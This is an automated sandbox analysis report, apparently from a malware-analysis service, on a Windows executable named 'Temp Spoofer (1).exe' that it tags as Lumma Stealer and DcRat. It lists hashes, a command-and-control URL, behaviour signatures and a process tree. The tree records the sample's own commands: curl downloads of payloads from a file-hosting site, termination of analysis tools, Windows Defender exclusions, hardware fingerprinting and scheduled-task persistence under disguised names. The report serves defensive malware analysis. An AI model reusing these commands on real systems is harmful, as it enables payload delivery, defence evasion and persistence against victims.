Overview

overview

10

Static

static

3

Temp Spoofer (1).exe

windows7-x64

8

Temp Spoofer (1).exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 15:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Temp Spoofer (1).exe

  • Size

    80KB

  • MD5

    4bade4cf3e468836937dffc66f28833a

  • SHA1

    0c36e2126793f13cc9f30584feb32f637590a951

  • SHA256

    1a54e3dd3ee11f50480247c45562ab2d12ba0dc80863020bc44b4e9ee98cd7cc

  • SHA512

    160f02b8ac61047f3384ea42f40f98b4f3455aca97eae229c911c146a81941e665613ed6989724604956a9b5f4f4a948da1410f0d885a1c9f7ca454ff29497fb

  • SSDEEP

    1536:uOmuEFBmau8ikz/S86fzhge8YaKCuWm5SepcVf:u2Krz/S86rh9CuWm5BpcV

Score
10/10
dcratlummadiscoveryevasionexecutioninfostealerratstealer

Malware Config

Extracted

Family

lumma

C2

https://fumblingactor.cyou/api

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Dcrat family
    dcrat
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 26 IoCs
    evasion
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Temp Spoofer (1).exe
    "C:\Users\Admin\AppData\Local\Temp\Temp Spoofer (1).exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4676
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im HTTPDebuggerUI.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1772
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1064
      • C:\Windows\system32\curl.exe
        curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
        3⤵
        • Drops file in Windows directory
        PID:1360
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Windows\system32\taskkill.exe
        taskkill /f /im HTTPDebuggerSvc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3844
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3480
      • C:\Windows\system32\sc.exe
        sc stop HTTPDebuggerPro
        3⤵
        • Launches sc.exe
        PID:1076
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:944
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:888
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2664
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3036
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1756
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2120
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4392
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4296
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4208
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:812
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1156
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4580
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:968
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:224
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4484
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2828
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2832
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:700
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3692
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1420
      • C:\Windows\system32\sc.exe
        sc stop HTTPDebuggerPro
        3⤵
        • Launches sc.exe
        PID:2500
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
      2⤵
        PID:3892
        • C:\Windows\system32\sc.exe
          sc stop KProcessHacker3
          3⤵
          • Launches sc.exe
          PID:3396
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
        2⤵
          PID:3940
          • C:\Windows\system32\sc.exe
            sc stop KProcessHacker2
            3⤵
            • Launches sc.exe
            PID:3092
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
          2⤵
            PID:4700
            • C:\Windows\system32\sc.exe
              sc stop KProcessHacker1
              3⤵
              • Launches sc.exe
              PID:4364
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
            2⤵
              PID:3388
              • C:\Windows\system32\sc.exe
                sc stop wireshark
                3⤵
                • Launches sc.exe
                PID:2032
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
              2⤵
                PID:4108
                • C:\Windows\system32\sc.exe
                  sc stop npf
                  3⤵
                  • Launches sc.exe
                  PID:4008
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
                2⤵
                  PID:2936
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im HTTPDebuggerUI.exe
                    3⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2272
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
                  2⤵
                    PID:4640
                    • C:\Windows\system32\taskkill.exe
                      taskkill /f /im HTTPDebuggerSvc.exe
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:980
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                    2⤵
                      PID:2104
                      • C:\Windows\system32\sc.exe
                        sc stop HTTPDebuggerPro
                        3⤵
                        • Launches sc.exe
                        PID:4432
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                      2⤵
                        PID:3272
                        • C:\Windows\system32\taskkill.exe
                          taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                          3⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4172
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                        2⤵
                          PID:1840
                          • C:\Windows\system32\taskkill.exe
                            taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                            3⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2516
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                          2⤵
                            PID:4200
                            • C:\Windows\system32\taskkill.exe
                              taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                              3⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2992
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                            2⤵
                              PID:3368
                              • C:\Windows\system32\taskkill.exe
                                taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                3⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4396
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                              2⤵
                                PID:3020
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                  3⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3568
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
                                2⤵
                                  PID:808
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
                                    3⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4224
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
                                  2⤵
                                    PID:3848
                                    • C:\Windows\system32\taskkill.exe
                                      taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                      3⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2996
                                  • C:\Windows\Speech\physmeme.exe
                                    "C:\Windows\Speech\physmeme.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of SetThreadContext
                                    • System Location Discovery: System Language Discovery
                                    PID:2812
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1692
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 1012
                                      3⤵
                                      • Program crash
                                      PID:3664
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
                                    2⤵
                                      PID:972
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                        3⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:584
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
                                      2⤵
                                        PID:4532
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                          3⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3436
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                        2⤵
                                          PID:4436
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                            3⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4368
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
                                          2⤵
                                            PID:332
                                            • C:\Windows\system32\taskkill.exe
                                              taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                              3⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4196
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                            2⤵
                                              PID:4380
                                              • C:\Windows\system32\sc.exe
                                                sc stop HTTPDebuggerPro
                                                3⤵
                                                • Launches sc.exe
                                                PID:184
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
                                              2⤵
                                                PID:1028
                                                • C:\Windows\system32\sc.exe
                                                  sc stop KProcessHacker3
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:692
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
                                                2⤵
                                                  PID:1948
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop KProcessHacker2
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:3096
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
                                                  2⤵
                                                    PID:2512
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop KProcessHacker1
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:4228
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
                                                    2⤵
                                                      PID:3268
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop wireshark
                                                        3⤵
                                                        • Launches sc.exe
                                                        PID:3528
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
                                                      2⤵
                                                        PID:1116
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop npf
                                                          3⤵
                                                          • Launches sc.exe
                                                          PID:2212
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c cls
                                                        2⤵
                                                          PID:5048
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
                                                          2⤵
                                                            PID:3052
                                                            • C:\Windows\system32\curl.exe
                                                              curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
                                                              3⤵
                                                              • Drops file in Windows directory
                                                              PID:4044
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c cls
                                                            2⤵
                                                              PID:4152
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c wmic diskdrive get model, serialnumber
                                                              2⤵
                                                                PID:1576
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic diskdrive get model, serialnumber
                                                                  3⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2344
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c wmic cpu get serialnumber
                                                                2⤵
                                                                  PID:3396
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic cpu get serialnumber
                                                                    3⤵
                                                                      PID:3892
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c wmic bios get serialnumber
                                                                    2⤵
                                                                      PID:1952
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic bios get serialnumber
                                                                        3⤵
                                                                          PID:2776
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber
                                                                        2⤵
                                                                          PID:2408
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic baseboard get serialnumber
                                                                            3⤵
                                                                              PID:3044
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c wmic path win32_computersystemproduct get uuid
                                                                            2⤵
                                                                              PID:4528
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic path win32_computersystemproduct get uuid
                                                                                3⤵
                                                                                  PID:3912
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c getmac
                                                                                2⤵
                                                                                  PID:2864
                                                                                  • C:\Windows\system32\getmac.exe
                                                                                    getmac
                                                                                    3⤵
                                                                                      PID:3680
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c pause>nul
                                                                                    2⤵
                                                                                      PID:2516
                                                                                    • C:\Windows\Speech\physmeme.exe
                                                                                      "C:\Windows\Speech\physmeme.exe"
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Modifies registry class
                                                                                      PID:5112
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Medal\Lqadn5PlaOgkwctRw0u0CpsLmFuP4Dy5KMER3d1aVdEsbDMhh.vbe"
                                                                                        3⤵
                                                                                        • Checks computer location settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:4456
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Medal\sfJ30b2ZZFyDMeam9b2hAYa.bat" "
                                                                                          4⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:772
                                                                                          • C:\Medal\Medal.exe
                                                                                            "C:\Medal/Medal.exe"
                                                                                            5⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            • Drops file in Windows directory
                                                                                            • Modifies registry class
                                                                                            PID:3296
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\WmiPrvSE.exe'
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:2500
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\dwm.exe'
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:3548
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:3556
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\fontdrvhost.exe'
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:2344
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\OfficeClickToRun.exe'
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:3588
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Medal\Medal.exe'
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:3092
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\IJlv46yGfz.bat"
                                                                                              6⤵
                                                                                                PID:724
                                                                                                • C:\Windows\system32\chcp.com
                                                                                                  chcp 65001
                                                                                                  7⤵
                                                                                                    PID:2820
                                                                                                  • C:\Windows\system32\w32tm.exe
                                                                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                    7⤵
                                                                                                      PID:944
                                                                                                    • C:\Medal\Medal.exe
                                                                                                      "C:\Medal\Medal.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3512
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2812 -ip 2812
                                                                                          1⤵
                                                                                            PID:8
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Photo Viewer\WmiPrvSE.exe'" /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:3904
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:3896
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Photo Viewer\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:4676
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Windows\Vss\dwm.exe'" /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1076
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Vss\dwm.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:3980
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Windows\Vss\dwm.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1028
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:4592
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:4536
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:920
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\fontdrvhost.exe'" /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:3840
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1116
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:5048
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\OfficeClickToRun.exe'" /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:2060
                                                                                          • C:\Windows\system32\schtasks.exe
